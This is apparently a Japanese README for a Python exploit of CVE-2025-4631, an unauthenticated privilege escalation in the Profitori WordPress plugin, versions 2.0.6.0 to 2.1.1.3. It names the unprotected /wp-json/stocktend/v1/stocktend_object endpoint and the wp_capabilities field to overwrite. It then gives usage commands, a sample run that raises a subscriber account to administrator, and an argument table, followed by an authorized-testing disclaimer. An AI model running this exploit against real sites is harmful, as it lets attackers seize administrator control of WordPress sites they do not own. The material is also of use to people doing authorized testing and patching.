
Profitori 2.0.6.0 - 2.1.1.3 - 認可の欠如による未認証の権限昇格
Profitori プラグイン(バージョン 2.0.6.0 から 2.1.1.3) は、/wp-json/stocktend/v1/stocktend_object エンドポイントの権限チェック欠如により、認証されていない権限昇格に対して脆弱です。これにより、リモート攻撃者は wp_capabilities メタフィールドを直接操作して、既存ユーザーの権限を昇格(または新規ユーザーを作成)することができます。
この Python エクスプロイトは、以下の手順で権限昇格プロセスを自動化します:
readme.txt ファイルを介してプラグインのバージョンを確認します。バージョンチェックが失敗した場合、エクスプロイトは警告とともに慎重に続行されます。

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requests ライブラリ以下のコマンドでインストール:
pip install requests
このツールは、教育および許可されたテスト目的のみで提供されています。所有していない、または明示的なテスト許可を得ていないシステムに対する本エクスプロイトの不正使用は、固く禁止されています。作成者は、不適切な使用によって生じたいかなる損害や法的結果についても責任を負いません。
作者: Nxploited ( Khaled_Alenazi )
| フラグ | 説明 | 必須 |
|---|
-u, --url | 🌐 WordPress サイトのベース URL | ✅ 必須 |
-id | 🆔 権限を昇格するユーザーの ID | ✅ 必須 |
--email | 📧 表示用のダミーメールアドレス | ❌ 任意 |
--name | 👤 表示名 | ❌ 任意 |
--url_field | 🔗 ユーザー URL フィールド | ❌ 任意 |
--verbose | 🔍 完全な JSON レスポンスを出力 | ❌ 任意 |